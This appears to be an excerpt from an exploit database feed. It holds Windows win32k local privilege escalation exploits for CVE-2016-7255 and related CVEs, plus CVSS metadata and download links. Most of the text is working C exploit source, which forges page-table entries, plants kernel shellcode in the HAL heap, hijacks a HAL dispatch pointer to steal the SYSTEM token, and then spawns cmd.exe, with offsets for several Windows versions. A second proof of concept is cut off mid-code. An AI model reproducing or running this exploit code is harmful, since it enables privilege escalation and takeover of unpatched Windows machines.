WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n#ifdef _WIN64\n\t\tpId = ((UCHAR*)pAddress - 0x28);\n#else\n\t\tpId = ((UCHAR*)pAddress - 0x14);\n#endif // #ifdef _WIN64\n\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\n\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild, GetDesktopWindow());\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\n\t\tSwitchToThisWindow(hWndChild, TRUE);\n\n\t\t_sim_alt_shift_esc();\n\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\n\t\t\t\n\t\t\tSetFocus(hWndParent);\n\t\t\t_sim_alt_esc(20);\n\t\t\tSetFocus(hWndChild);\n\t\t\t_sim_alt_esc(20);\n\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t\t\n\t\t\tif (value != 0) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t\n\n\t\t\t__try {\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\n\t\t\t\tif ((value & 0x67) == 0x67) {\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t}\n\n\n\t} while (FALSE);\n\n\tif (NULL != hWndParent)\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif (NULL != hWndChild)\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\n\n\treturn 0;\n}\n\nUINT64 get_pxe_address(UINT64 address) {\n\tUINT entry = PML4_SELF_REF_INDEX;\n\tUINT64 result = address >> 9;\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\n\tresult = result | lower_boundary;\n\tresult = result & upper_boundary;\n\treturn result;\n}\n\nUINT64 look_free_entry_pml4(void) {\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\n\tint offset = 0xF00;\n\tUINT64 pml4_search = PML4_BASE + offset;\n\twhile (offset < 0xFF8)\n\t{\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\n\t\t{\n\t\t\t// This is a NULL (free) entry\n\t\t\tbreak;\n\t\t}\n\t\toffset += 8;\n\t\tpml4_search = PML4_BASE + offset;\n\t}\n\treturn pml4_search;\n}\n\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\n\tUINT64 result = (\n\t\t((UINT64)0xFFFF << 48) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\n\t\t(index << 12)\n\t\t);\n\treturn result;\n}\n\n\n\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\n\n\t/*\n\t1: kd> !pte ffffffff`ffd00000\n\tVA ffffffffffd00000\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\n\t*/\t\n\n\tUINT64 pte = get_pxe_address(virtual_address);\n\tint pte_offset = pte & 0xFFF;\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\n\t\n\tUINT64 pde = get_pxe_address(pte);\n\tint pde_offset = pde & 0xFFF;\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\n\t\t\n\tUINT64 pdpte = get_pxe_address(pde);\n\tint pdpte_offset = pdpte & 0xFFF;\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\n\t\t\n\tUINT64 pml4e = get_pxe_address(pdpte);\n\tint pml4e_offset = pml4e & 0xFFF;\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\n\t\n\tUINT64 spurious_offset = look_free_entry_pml4();\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\n\tUINT64 f_e_pml4 = spurious_offset;\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\n\tprintf(\"--------------------------------------------------\\n\\n\");\n\t\n\t\n\t//Read the physical address of pml4e\t\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\n\t// Change the PxE\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\n\t\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pdpte\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\n\t// Change the PxE\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pde\n\tUINT64 pde_addr = spurious_pt + pde_offset;\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\n\t// Change the PxE\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pte\n\tUINT64 pte_addr = spurious_pt + pte_offset;\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\n\t// Change the PxE\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \n\tif (patch_original) {\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\n\t}\n \n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\tprintf(\"\\n\\n\");\n\treturn spurious_pt;\n}\n\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteAddress += (target_address & 0xFFF);\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\n}\n\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteTarget += (target_address & 0xFFF);\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\n\t*(PVOID *)target = (PVOID)hook_address;\n}\n\n\nUINT64 store_shellcode_in_hal(void) {\n\t//// Finally store the shellcode on the HAL\n\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\n\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \n\t// 0xfff - 0xd50 = 0x2af space\n\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\n\treturn 0xffffffffffd00d50;\n}\n\nUINT64 GetHalDispatchTable() {\n PCHAR KernelImage;\n SIZE_T ReturnLength;\n HMODULE hNtDll = NULL;\n UINT64 HalDispatchTable;\n HMODULE hKernelInUserMode = NULL;\n PVOID KernelBaseAddressInKernelMode;\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\n\n hNtDll = LoadLibrary(\"ntdll.dll\");\n\n if (!hNtDll) {\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\n\n if (!NtQuerySystemInformation) {\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\n\n // Allocate the Heap chunk\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n ReturnLength);\n\n if (!pSystemModuleInformation) {\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\n pSystemModuleInformation,\n ReturnLength,\n &ReturnLength);\n\n if (NtStatus != STATUS_SUCCESS) {\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\n\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\n \n hKernelInUserMode = LoadLibraryA(KernelImage);\n\n if (!hKernelInUserMode) {\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n // This is still in user mode\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\n\n if (!HalDispatchTable) {\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n else {\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\n\n // Here we get the address of HapDispatchTable in Kernel mode\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\n }\n\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\n\n if (hNtDll) {\n FreeLibrary(hNtDll);\n }\n\n if (hKernelInUserMode) {\n FreeLibrary(hKernelInUserMode);\n }\n\n hNtDll = NULL;\n hKernelInUserMode = NULL;\n pSystemModuleInformation = NULL;\n\n return HalDispatchTable;\n}\n\nint __cdecl main(int argc, char** argv)\n{\n\tTCHAR pre_username[256];\n\tTCHAR post_username[256];\n\tDWORD size = 256;\n\tULONG Interval = 0;\n\tHMODULE hNtDll = NULL;\n\tUINT retval;\n UINT64 overwrite_address;\n int overwrite_offset;\n \n // define operating system version specific variables\n unsigned char sc_KPROCESS;\n unsigned int sc_TOKEN;\n unsigned int sc_APLINKS;\n\tint osversion;\n\n\tif (argc != 2) {\n\t\tprintf(\"Please enter an OS version\\n\");\n\t\tprintf(\"The following OS'es are supported:\\n\");\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\n\t\tprintf(\"\\n\");\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\n\t\treturn -1;\n\t}\n\t\n\tosversion = _strtoui64(argv[1], NULL, 10);\n\t\n if(osversion == 7) \n {\n // the target machine's OS is Windows 7 SP1\n printf(\" [+] Windows 7 SP1\\n\");\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \n }\n\telse if(osversion == 81)\n {\n // the target machine's OS is Windows 8.1\n printf(\" [+] Windows 8.1\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 10)\n {\n // the target machine's OS is Windows 10 prior to build 14393\n printf(\" [+] Windows 10\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 12)\n {\n // the target machine's OS is Windows 2012 R2\n printf(\" [+] Windows 2012 R2\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n // in case the OS version is not any of the previously checked versions\n else\n {\n printf(\" [-] Unsupported version\\n\");\n printf(\" [*] Affected 64-bit operating systems\\n\");\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\n return -1;\n }\n \n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\n GetUserName(pre_username, &size);\n\tprintf(\"Current Username: %s\\n\", pre_username);\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\n\tprintf(\"Enter to continue...\\n\");\n\tgetchar();\n\n\tdo\n\t{\n\t\tor_address_value_4((void*)PML4_SELF_REF);\n\t} while (FALSE);\n\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\n\t\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\n\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\n\tDWORD pid = GetCurrentProcessId();\n \n /* Shellcode Patching !! */\n\tchar *p = shellcode;\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\n\n\tp += 12; // Patch shellcode with original value in the Overwrite address\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\n\n\tp += 12; // To patch the PID of our process\n\t\n\t*(DWORD *)p = (DWORD)pid;\n \n p += 17;\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\n \n p += 7;\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n UINT64 shellcode_va = store_shellcode_in_hal();\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\n\t\n\tif (osversion == 7){\n\t\t// Exploit Win7.1\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\n\n\t\tif (!hNtDll) {\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\n\n\t\tif (!NtQueryIntervalProfile) {\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\t\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\n\t}\n\n\t\n\twhile (1) {\n\t\tsize = 256;\n\t\tGetUserName(post_username, &size);\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\n\t}\n\tSleep(2000);\n\tsystem(\"cmd.exe\");\n\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - Win32k Local Privilege Escalation", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-15T00:00:00", "title": "Microsoft Windows - Win32k Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0803", "CVE-2016-7255"], "modified": "2019-05-15T00:00:00", "id": "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "href": "", "sourceData": "# CVE-2019-0803\nWin32k Elevation of Privilege Poc\n\nReference\n-----------------------------\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\n\n\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k Denial of Service (MS16-135)", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0075", "CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123", "href": "", "sourceData": "/*\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\nFull Proof of Concept:\n\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\n\n********************************************************************\n Created:\t2016-11-09 14:23:09\n Filename: \tmain.c\n Author:\troot[at]TinySec.net\n Version\t0.0.0.1\n Purpose:\tpoc of cve-2016-0075\n*********************************************************************\n*/\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n\n//////////////////////////////////////////////////////////////////////////\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n\n#undef DbgPrint\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList=NULL;\n\tULONG ulRet = 0;\n\t\n\tdo \n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\n\t\t\n\t\tva_start(VaList,Format);\n\t\t\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\n\t\t\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\n\t\tOutputDebugStringA(pszDbgBuff);\n\t\t\n\t\tva_end(VaList);\n\t\t\n\t} while (FALSE);\n\t\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\n\t\tpszDbgBuff = NULL;\n\t}\n\t\n\treturn ulRet;\n}\n\n\n int _sim_key_down(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = 0;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_key_up(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_alt_shift_esc()\n {\n\t int i = 0;\n\t \n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\t\t \n\t\t\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\t\t\t \n\t\t _sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \t \n\t\t \n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n \n\n int _sim_alt_shift_tab(int nCount)\n {\n\t int i = 0;\n\t HWND hWnd = NULL;\n\n\n\t int nFinalRet = -1;\n\n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\n\n\t\t for ( i = 0; i < nCount ; i++)\n\t\t {\n\t\t\t _sim_key_down( VK_TAB);\n\t\t\t _sim_key_up( VK_TAB);\n\t\t\t \n\t\t\t Sleep(1000);\n\n\t\t }\n\t\n\t\t \n\t\t_sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \n\t } while (FALSE);\n\t \n\t return nFinalRet;\n}\n\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = {0};\n\n\tHWND\thWndParent = NULL;\n\tHWND\thWndChild = NULL;\n\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\n\n\tvoid*\tpId = NULL;\n\tMSG\t\tstMsg = {0};\n\n\tdo \n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\t\t\n\t\tif ( 0 == RegisterClassExW(&stWC) )\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\t\t\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\t#ifdef _WIN64\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \n\t\t#else\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \n\t\t#endif // 